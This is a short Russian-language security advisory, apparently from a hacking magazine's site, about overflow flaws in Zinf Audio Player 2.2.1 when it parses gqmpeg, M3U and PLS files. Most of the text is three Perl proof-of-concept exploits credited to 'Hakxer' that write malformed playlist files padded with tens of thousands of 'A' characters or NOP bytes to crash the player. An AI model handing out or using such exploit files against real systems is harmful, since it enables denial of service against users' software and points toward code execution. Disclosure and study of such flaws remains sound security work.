Хакер #305. Многошаговые SQL-инъекции
Программа: Zinf Audio Player 2.2.1
Уязвимость позволяет удаленному злоумышленнику осуществить DoS атаку и
выполнить произвольный код на целевой системе. Уязвимость существует из-за
ошибки в проверке входных данных при обработке gqmpeg, M3U и PLS файлов.
Атакующий может передать специально сформированные файлы, что приведет к отказу
системы в обслуживании и выполнению произвольного кода.
Эксплоит:
#!/usr/bin/perl
# Discovered & Written by : Hakxer
# Home : www.sec-geeks.com
# Program : http://www.zinf.org/ ../http://prdownloads.sourceforge.net/zinf/zinf-setup-2.2.1.exe
# Zinf Audio Player 2.2.1 ( gqmpeg FILE) Buffer Overflow PoC
# Greetz to : Egyptianxhacker,ProViDoR , Br1ght D@rk , Error Code , Kof2002 ,
Sql_Inj3ct0r , egy coders team , Sec-geeks.com
my $deamoddd="http://"."A" x 70000;
open(MYFILE,'>>hakxer.gqmpeg');
print MYFILE $deamoddd;
close(MYFILE);
print "PoC Created .. Hakxer [sec-geeks.com] EgY Coders Team";
Эксплоит:
#!/usr/bin/perl
# Discovered & Written by : Hakxer
# Home : www.sec-geeks.com
# Program : http://www.zinf.org/ ../http://prdownloads.sourceforge.net/zinf/zinf-setup-2.2.1.exe
# Zinf Audio Player 2.2.1 (M3U FILE) Local Heap Overflow
my $chars="http://"."A" x 50000;
open(MYFILE,'>>hakxer.m3u');
print MYFILE $chars;
close(MYFILE);
print " Done";
Эксплоит:
#!/usr/bin/perl
# Discovered & Written by : Hakxer
# Home : www.sec-geeks.com
# Program : http://www.zinf.org/ ../http://prdownloads.sourceforge.net/zinf/zinf-setup-2.2.1.exe
# Zinf Audio Player 2.2.1 (PLS FILE) Buffer Overflow PoC
my $chars="\x90" x 2000;
open(MYFILE,'>>hakxer.pls');
print MYFILE $chars;
close(MYFILE);
print " PoC Created .. Hakxer [ Sec-Geeks.com ] EgY Coders Team";